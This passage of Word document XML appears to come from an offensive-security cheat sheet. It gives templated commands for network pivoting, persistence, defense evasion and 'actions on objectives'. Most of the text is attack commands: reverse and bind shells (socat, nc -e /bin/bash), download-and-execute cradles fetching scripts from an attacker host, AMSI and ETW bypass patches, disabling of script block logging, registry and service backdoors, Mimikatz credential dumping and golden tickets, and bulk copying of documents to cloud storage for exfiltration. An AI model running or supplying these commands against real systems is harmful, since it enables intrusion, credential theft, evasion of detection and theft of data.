$KEY_FILE'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Chisel</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_07" w:id="75"/>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast TCP/UDP tunneling tool over HTTP transported via SSH with built-in SOCKS and port forwarding for network pivoting scenarios.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Server Start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server -p $PORT --reverse --socks5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Client Connect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client http://$SERVER:$PORT R:socks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Port Forward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client http://$SERVER:$PORT $LOCAL_PORT:$TARGET:$TARGET_PORT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Reverse Forward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client http://$SERVER:$PORT R:$LOCAL_PORT:$TARGET:$TARGET_PORT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Auth Connect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client --auth $USER:$PASS http://$SERVER:$PORT R:socks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TLS Server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server -p $PORT --reverse --tls-cert $CERT --tls-key $KEY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TLS Client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client https://$SERVER:$PORT R:socks --fingerprint $FINGERPRINT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 Forward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client http://$SERVER:$PORT $L1:$T1:$P1 $L2:$T2:$P2 R:socks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Verbose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client -v http://$SERVER:$PORT R:socks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UDP Forward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chisel client http://$SERVER:$PORT $LOCAL_PORT/udp:$TARGET:$TARGET_PORT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Socat</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_08" w:id="76"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Versatile networking utility that establishes bidirectional byte streams for port forwarding, proxying, and creating tunnels between systems.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Port Forward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TCP-LISTEN:$LOCAL_PORT,fork TCP:$TARGET:$TARGET_PORT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Reverse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TCP:$LHOST:$LPORT EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane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Bind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TCP-LISTEN:$PORT,fork EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane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Transfer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TCP:$TARGET:$PORT file:$FILE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Encrypted Tunnel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OPENSSL-LISTEN:$PORT,cert=$CERT,key=$KEY,verify=0,fork TCP:$TARGET:$TARGET_PORT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UDP Relay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UDP-LISTEN:$LOCAL_PORT,fork UDP:$TARGET:$TARGET_PORT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TTY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file:\`tty\`,raw,echo=0 TCP-LISTEN:$PORT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TCP-LISTEN:$PORT,fork PROXY:$PROXY_HOST:$TARGET:$TARGET_PORT,proxyport=$PROXY_PORT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SOCKS4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TCP-LISTEN:$PORT,fork SOCKS4:$SOCKS_HOST:$TARGET:$TARGET_PORT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Pipe Multiple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socat -d -d TCP-LISTEN:$PORT1,fork TCP:$TARGET:$PORT2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WMIOps</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_09" w:id="77"/>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell-based WMI operation toolkit for lateral movement through Windows Management Instrumentation with process creation and event subscription.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Remote Process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Invoke-WmiCommand -ComputerName $TARGET -Credential $CRED -ScriptBlock { $COMMAND }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Remote Service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Invoke-WMIExec -Target $TARGET -Username $USER -Password $PASSWORD -Command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Process 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Get-WmiObject -Class Win32_Process -ComputerName $TARGET -Credential $CRED | Select-Object Name, ProcessId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Create Process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Invoke-WmiMethod -Path Win32_Process -Name Create -ComputerName $TARGET -Credential $CRED -ArgumentList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Event Subscription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Invoke-WmiEventSubscription -ComputerName $TARGET -Credential $CRED -EventFilter $FILTER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Remote Registry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Invoke-WMIRegistry -Target $TARGET -Credential $CRED -KeyPath $KEY_PATH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Scheduled Task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Invoke-SchedTask -ComputerName $TARGET -Credential $CRED -TaskName $NAME -Command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Transfer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Invoke-WmiFileTransfer -ComputerName $TARGET -Credential $CRED -LocalFile $FILE -RemotePath $DEST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Service Query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Get-WmiObject -Class Win32_Service -ComputerName $TARGET -Credential $CRED | Where-Object { \$_.State -eq 'Running' }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System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Get-WmiObject -Class Win32_ComputerSystem -ComputerName $TARGET -Credential $CRED | Select-Object *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ProxyChains-NG</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_10" w:id="78"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Network proxy redirection tool that forces any TCP connection through SOCKS4a/5 or HTTP proxies for tunneling traffic through pivot points.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SOCKS5 Chain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 -f $CONFIG_FILE $COMMAND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Nmap Through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 nmap -sT -Pn -p $PORTS $TARGET -oN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SSH Through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 ssh $USER@$TARGET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RDP Through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 xfreerdp /v:$TARGET /u:$USER /p:$PASSWORD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Curl Through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 curl -s http://$TARGET:$PORT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Config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proxychains4 -f /etc/proxychains4.conf $COMMAND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Quiet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 -q $COMMAND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Dynamic Chain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proxychains4 -f $DYNAMIC_CONF $COMMAND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Random Chain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proxychains4 -f $RANDOM_CONF $COMMAND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MetaSploit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proxychains msfconsole -q -x 'use exploit/multi/handler; setg Proxies socks4:127.0.0.1:$PORT'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8: Persistence &amp; Defense Evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008" w:id="79"/>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Techniques for maintaining access to compromised systems while avoiding detection by security controls, EDR solutions, and forensic analysis.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Meterpreter (MSF)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_01" w:id="80"/>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced dynamically extensible payload that provides interactive shell capabilities, in-memory execution, and extensive post-exploitation modules.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Migrate Process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migrate $PID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Get System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getsystem -t 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Load Kiwi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load kiwi; creds_all; lsa_dump_sam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Persistence Service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run persistence -U -i 5 -p $LPORT -r $LHOST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Run Script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run post/$MODULE_PATH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Screenshot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screenshot -p $OUTPUT_PATH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Keylogger Start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keyscan_start; keyscan_dump; keyscan_stop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Port Forward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portfwd add -l $LOCAL_PORT -p $TARGET_PORT -r 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Route Add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run autoroute -s $SUBNET; route add $SUBNET $MASK $SESSION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In-Memory Exec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meterpreter &gt; execute -H -m -d calc.exe -f $PAYLOAD_PATH -a '$ARGS'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PowerSploit</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_02" w:id="81"/>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment with persistence capabilities.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Persistence WMI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Invoke-WmiPersistence -Verbose -Payload 'powershell -enc $ENCODED_PAYLOAD'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Registry Backdoor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Invoke-RegistryBackdoor -Payload 'powershell -enc $ENCODED_PAYLOAD' -Verbose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Scheduled Task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New-ScheduledTaskBackdoor -TriggerAt $TIME -Payload 'powershell -enc $ENCODED_PAYLOAD'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Service Backdoor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Invoke-ServiceBackdoor -ServiceName $SERVICE -Payload 'powershell -enc $ENCODED_PAYLOAD'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DLL Hijack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Find-ProcessDLLHijack -ProcessName $PROCESS -Verbose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Add Persistence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Add-Persistence -ScriptBlock { $SCRIPT_BLOCK } -ElevatedPersistenceMethod Registry -Verbose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Remove Persistence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Remove-Persistence -ElevatedPersistenceMethod Registry -Verbose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Netsh Helper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Invoke-NetshHelper -Payload 'c:\windows\system32\payload.dll'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AppCert DLLs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Invoke-AppCertDLLs -Payload 'c:\windows\system32\payload.dll'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TimeBased Trigge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Invoke-TimeBasedTrigger -Interval 300 -Payload 'powershell -enc $ENCODED_PAYLOAD'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Cobalt Strike</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_03" w:id="82"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Commercial adversary simulation platform with powerful persistence mechanisms including WMI events, scheduled tasks, and service-based backdoors.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WMI Event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wmi_apc $TARGET $LISTENER $EVENT_FILTER $EVENT_CONSUMER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Scheduled Task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schtasks_create $TARGET $TASK_NAME $TRIGGER '$PAYLOAD_PATH'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Service Install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psexec_psh $TARGET $LISTENER $SERVICE_NAME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Registry Run Keys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reg_command $TARGET 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' '$NAME'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DLL Hijack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dll_hijack $TARGET $TARGET_DLL $PAYLOAD_DLL $LISTENER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Startup Folder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upload $TARGET 'c:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.lnk' $PAYLOAD_PATH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BITS Job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bits_job $TARGET $JOB_NAME $REMOTE_URL $LOCAL_PATH $LISTENER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Skeleton Key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skeleton_key $TARGET $DOMAIN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Golden Ticket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golden_ticket $DOMAIN $SID $KRBTGT_HASH $USER $TARGET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Persist Beacon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persist $TARGET $LISTENER $METHOD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AmsiBypass</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_04" w:id="83"/>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell AMSI (Anti-Malware Scan Interface) bypass techniques that enable execution of scripts without detection by Windows Defender and other AMSI-integrated solutions.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Memory Patch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[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)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Reflection Patch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a=[Ref].Assembly.GetTypes();Foreach($b in $a){if($b.Name -like '*iUtils'){$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d){if($e.Name -like '*Context'){$f=$e}};$f.SetValue($null,[IntPtr]::Zero)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DLL Patching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IEX (New-Object Net.WebClient).DownloadString('http://$LHOST:$LPORT/amsi_bypass.ps1')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Base64 Encode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[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes((Get-Content $SCRIPT_PATH)))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XOR Obfuscation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$key=$XOR_KEY;$bytes=[IO.File]::ReadAllBytes('$SCRIPT_PATH');for($i=0;$i -lt $bytes.count;$i++){$bytes[$i]=$bytes[$i]-bxor$key};[IO.File]::WriteAllBytes('$OUTPUT_PATH',$bytes)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Reflective DLL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Invoke-ReflectivePEInjection -PEBytes $PE_BYTES -FuncReturnType Void -ForceASLR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Syscall Hook Bypass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Invoke-SyscallBypass -Technique $TECHNIQUE -Payload $PAYLOAD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ETW Patch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Invoke-ETWPatch -Method $METHOD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CLR Hook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Invoke-CLRHook -Assembly $ASSEMBLY -Method $METHOD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Script Block Logging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Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 0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WinPwn</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_05" w:id="84"/>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Internal penetration testing and privilege escalation automation script for Windows with AMSI bypass, PowerUp, PowerView, and exploitation tools.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Automated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Net.WebClient).DownloadString('http://$LHOST:$LPORT/WinPwn.ps1'); WinPwn -noninteractive -repo http://$LHOST:$LPORT"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PowerUp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Net.WebClient).DownloadString('http://$LHOST:$LPORT/WinPwn.ps1'); Invoke-PowerUp"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PowerView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"IEX(New-Object Net.WebClient).DownloadString('http://$LHOST:$LPORT/WinPwn.ps1'); Invoke-PowerView"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Privesc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"WinPwn -Privesc"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AD Recon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"WinPwn -ADrecon"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Session Gopher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"WinPwn -SessionGopher"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Kittie Meow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"WinPwn -Kittie"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Lazagne Extract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"WinPwn -Lazagne"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Rubeus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"WinPwn -Rubeus"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SafetyKatz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powershell -ep bypass -c "WinPwn -SafetyKatz"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Backdoor Factory</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_06" w:id="85"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tool that patches existing Windows executables and ELF binaries with shellcode while maintaining original functionality for stealthy persistence.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Patch Binary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$SHELLCODE_TYPE -H $LHOST -P $LPORT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Show Caves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show -c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Payload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$SHELLCODE -p $PAYLOAD -H $LHOST -P $LPORT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Jump Code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$SHELLCODE -J -H $LHOST -P $LPORT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Support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show -S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Section New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$SHELLCODE -a -H $LHOST -P $LPORT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Encoded Payload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$SHELLCODE -e x86/shikata_ga_nai -H $LHOST -P $LPORT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Verbose Patch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-v -f $BINARY -s $SHELLCODE -H $LHOST -P $LPORT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 Patch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$SHELLCODE -m -H $LHOST -P $LPORT -o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Check Binary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backdoor.py -f $BINARY -s show -z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ICeWrapper</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_07" w:id="86"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell script wrapper that encrypts and obfuscates PowerShell payloads to evade antivirus detection and application whitelisting controls.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AES Encrypt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'$PAYLOAD' -Method AES -Key $AES_KEY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XOR Obfuscate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'$PAYLOAD' -Method XOR -Key $XOR_KEY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Base64 Wrap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'$PAYLOAD' -Method Base64 -Output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Compress Encrypt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'$PAYLOAD' -Method Compress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Encoding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'$PAYLOAD' -Method Custom -EncodingTable $TABLE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 Layer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'$PAYLOAD' -Method Multi -Layers 3 -Output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Direct Execute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'$PAYLOAD' -Execute -Method AES -Key $AES_KEY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Input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-FilePath $INPUT_FILE -Method AES -Key $AES_KEY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String Obfuscate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'$PAYLOAD' -Method StringObfuscation -Output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Reverse Shell Wrap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Invoke-ICeWrapper -Payload 'IEX(New-Object Net.WebClient).DownloadString("http://$LHOST:$LPORT/shell.ps1")' -Method AES -Key $KEY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DynAMSy</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_08" w:id="87"/>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dynamic AMSI evasion toolkit that uses memory patching and reflection techniques to bypass Windows Defender real-time protection.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Bypass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-Technique Patch -Verbose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Manual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-Technique Manual -ScriptBlock { $BLOCK }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Context Patch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-Technique Context -Verbose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DLL Unload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-Technique Unload -Verbose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Hook Bypass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-Technique Hook -Target $TARGET_DLL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Stager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-Stager -URL http://$LHOST:$LPORT/stage2.ps1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Encoded Stager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-Stager -EncodedPayload $B64_PAYLOAD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ETW Bypass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-ETW -Technique Patch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Combined Evasion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-AMSI -ETW -Technique Patch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Check Status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Invoke-DynAMSy -Check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Invoke-Obfuscation</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_09" w:id="88"/>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell command and script obfuscator that applies multiple encoding and obfuscation techniques to evade signature-based detection.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Token Obfuscation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'Token\All\1'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String Obfuscation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-ScriptPath $SCRIPT -Command 'String\1'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Encoding ASCII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'Encoding\1'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Encoding Hex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'Encoding\2'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Encoding Base64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'Encoding\3'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Compression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'Compress\1'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Launcher PS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'Launcher\PS\1'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Launcher WMI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'Launcher\WMIC\1'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Launcher Rundll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'Launcher\Rundll\1' -Quiet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 Obfuscate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Invoke-Obfuscation -ScriptBlock { $SCRIPT } -Command 'Token\All\1,Encoding\3,Launcher\PS\1'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Sliver C2</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008_10" w:id="89"/>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open-source adversary emulation framework with built-in evasion, multiple C2 protocols, and armory extensions for post-exploitation and persistence.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Execute Assembly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execute-assembly -t $TIMEOUT $ASSEMBLY_PATH '$ARGS'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Inline Execute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inline-execute $SHELLCODE_PATH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Registry Persist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registry write 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' '$NAME' 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Service Create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execute -o sc create $SERVICE_NAME binPath= '$PAYLOAD_PATH' start= auto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Task Schedule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execute -o schtasks /create /tn $TASK /tr '$PAYLOAD' /sc minute /mo 5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WMI Event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execute -o wmic /namespace:'\\\root\\subscription' PATH CommandLineEventConsumer CREATE Name='$NAME', CommandLineTemplate='$COMMAND'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Mimikatz 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load-extension $EXTENSION_ID; ls; mimikatz 'privilege::debug' 'sekurlsa::logonpasswords'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Screenshot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screenshot -s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Port Forward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portfwd add -b $BIND_PORT -r $REMOTE_HOST:$REMOTE_PORT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SOCKS Proxy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sliver &gt; socks5 start -P $LOCAL_PORT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9: Actions on Objectives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009" w:id="90"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Execution of the primary mission goals including data exfiltration, system disruption, evidence collection, and achieving the defined operational objectives.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Rclone</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_01" w:id="91"/>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Command-line program to manage files on cloud storage with support for 70+ providers, featuring advanced sync, copy, and crypt operations for data handling.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Sync to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sync $LOCAL_DIR $REMOTE:$BUCKET --progress --transfers 16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Copy Files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copy $LOCAL_PATH $REMOTE:$BUCKET/$DEST --progress --transfers 32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Crypt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copy $LOCAL_DIR $CRYPT_REMOTE:$BUCKET --password $CRYPT_PASS --salt-password $SALT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ls $REMOTE:$BUCKET --max-depth 3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Mount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mount $REMOTE:$BUCKET $MOUNT_POINT --daemon --vfs-cache-mode writes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Check Integrity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check $LOCAL_DIR $REMOTE:$BUCKET --one-way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Bandwidth Limit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copy $LOCAL_DIR $REMOTE:$BUCKET --bwlimit 10M --progress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Filter Copy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copy $LOCAL_DIR $REMOTE:$BUCKET --include '*.{{doc,docx,pdf,xls,xlsx,txt,zip}}' --progress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Delete Remote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delete $REMOTE:$BUCKET --min-age 7d --dry-run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Config Show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rclone config show $REMOTE; rclone about $REMOTE:$BUCKET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Netcat (nc/ncat)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_02" w:id="92"/>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Versatile networking utility for reading from and writing to network connections using TCP or UDP with extensive file transfer and proxy capabilities.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Listener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nc -lvnp $PORT -e /bin/bash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Connect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nc $TARGET $PORT -e /bin/bash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Send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nc -w 3 $TARGET $PORT &lt; $FILE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Receive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nc -lvnp $PORT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Banner Grab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echo '' | nc -v -w 2 $TARGET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Port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nc -zv -w 2 $TARGET $START_PORT-$END_PORT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UDP Listener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nc -u -lvnp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Proxy Chain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nc -lkvp $LOCAL_PORT -c 'nc $TARGET $TARGET_PORT'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 Request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printf 'GET / HTTP/1.1\r\nHost: $TARGET\r\n\r\n' | nc $TARGET 80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Chat Server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nc -lvnp $PORT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Steghide</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_03" w:id="93"/>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Steganography program that hides data inside various image and audio file formats using password-protected encryption for covert data storage.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Embed Data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embed -cf $COVER_FILE -ef $SECRET_FILE -p $PASSWORD -sf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Extract Data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extract -sf $STEGO_FILE -p $PASSWORD -xf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Info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info $STEGO_FILE -p $PASSWORD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Encrypt Embed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embed -cf $COVER_FILE -ef $SECRET_FILE -p $PASSWORD -e $CIPHER -sf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Compress Embed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embed -cf $COVER_FILE -ef $SECRET_FILE -p $PASSWORD -z $COMPRESSION -sf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Without Encryption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embed -cf $COVER_FILE -ef $SECRET_FILE -p '' -sf $OUTPUT_FILE -q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JPEG Embed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embed -cf $COVER_JPG -ef $SECRET_FILE -p $PASSWORD -sf $OUTPUT_JPG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WAV Embed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embed -cf $COVER_WAV -ef $SECRET_FILE -p $PASSWORD -sf $OUTPUT_WAV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BMP Embed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steghide embed -cf $COVER_BMP -ef $SECRET_FILE -p $PASSWORD -sf $OUTPUT_BMP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Batch Process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for f in $COVER_DIR/*; do steghide embed -cf "$f" -ef $SECRET_FILE -p $PASSWORD; done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CryptCat</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_04" w:id="94"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Netcat variant with integrated AES encryption for secure data transfer and remote shell access over encrypted channels.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Encrypted Listener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-l -p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Encrypted Connect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$TARGET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Encrypted Shell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-l -p $PORT -e /bin/bash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File Transfer Enc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-l -p $PORT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UDP Encrypted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-u -l -p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Hex Key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$HEX_KEY -l -p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Source Bind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-s $SOURCE_IP -l -p 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Zero I/O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-z -v -n $TARGET $START_PORT-$END_PORT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Tee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-l -p $PORT | tee $LOG_FILE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Wait Timeout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cryptcat -k $PASSWORD -w 5 -l -p $PORT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Mimikatz (Credential Ops)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_05" w:id="95"/>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential post-exploitation tool for credential extraction, Kerberos ticket manipulation, and Active Directory privilege escalation operations.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Dump Credentials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'token::elevate' 'privilege::debug' 'sekurlsa::logonpasswords full'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Dump Tickets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'sekurlsa::tickets /export'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Pass-the-Hash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'sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH /run:cmd.exe'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Golden Ticket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'kerberos::golden /user:$USER /domain:$DOMAIN /sid:$SID /krbtgt:$KRBTGT_HASH /ticket:$OUTPUT'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Silver Ticket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'kerberos::silver /user:$USER /domain:$DOMAIN /sid:$SID /target:$TARGET /service:$SERVICE /rc4:$HASH /ticket:$OUTPUT'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Skeleton Key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'privilege::debug' 'misc::skeleton'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LSADUMP SAM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'token::elevate' 'lsadump::sam'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LSADUMP Secrets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'token::elevate' 'lsadump::secrets'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DPAPI Backup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'dpapi::backupkeys /in:$SERVER /export' 'exit'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Token Manipulation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mimikatz.exe 'token::elevate' 'token::run /user:$DOMAIN/$USER /process:$PROCESS' 'exit'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Sysinternals Suite</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_06" w:id="96"/>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Microsoft's advanced system utilities for Windows management, troubleshooting, and diagnostics including process monitoring and security tools.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Process Monitor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procmon.exe /BackingFile $LOG_FILE /Quiet /Minimized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Process Explorer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procexp.exe /t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AutoRuns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autorunsc.exe -a * -c -h -s '*'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TCPView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tcpvcon.exe -a -c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PsList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pslist.exe -t -m $PROCESS_NAME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Handle Viewer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handle.exe -a -p $PROCESS_NAME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ListDLLs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listdlls.exe -v $PROCESS_NAME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Logon Sessions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logonsessions.exe -c -p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Access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accesschk.exe -u -w $TARGET_PATH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SigCheck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sigcheck.exe -a -h -u -v -vt $TARGET_FILE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tcpdump</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_07" w:id="97"/>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Powerful command-line packet analyzer for network traffic capture, filtering, and analysis with extensive protocol support.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Capture All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-w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Host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host $TARGET_IP -w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Port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port $PORT -w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Network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net $SUBNET -w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Protocol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icmp or arp -w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Read PCAP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-r $PCAP_FILE -nn -A 'host $IP and port $PORT'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Verbose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-nn -vvv -X 'host $TARGET_IP'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Snapshot Length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-s 0 -w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Rotate Capture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-w $OUTPUT_FILE -C 100 -W 10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ASCII Display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tcpdump -i $INTERFACE -nn -A 'port 80 or port 443'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 ExifTool</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_08" w:id="98"/>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Platform-independent Perl library and command-line application for reading, writing, and editing metadata in a wide variety of files.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Read Metadata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$TARGET_FILE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Write Metadata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-Artist='$VALUE' -Copyright='$VALUE' $TARGET_FILE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Strip Metadata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-all= $TARGET_FILE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Batch Process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-r -ext $EXTENSION $TARGET_DIR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GPS Extract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-gpslatitude -gpslongitude -n $TARGET_FILE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Tag Extract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-$TAG $TARGET_FILE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Compare Files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-a -G1 -w $DIFF_FILE $FILE1 $FILE2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JSON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-j -g $TARGET_FILE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CSV Export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-csv -r $TARGET_DIR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Time Shift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exiftool '-AllDates+=0:0:0 $HOURS:0:0' $TARGET_FILE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Sqlite3</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_09" w:id="99"/>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
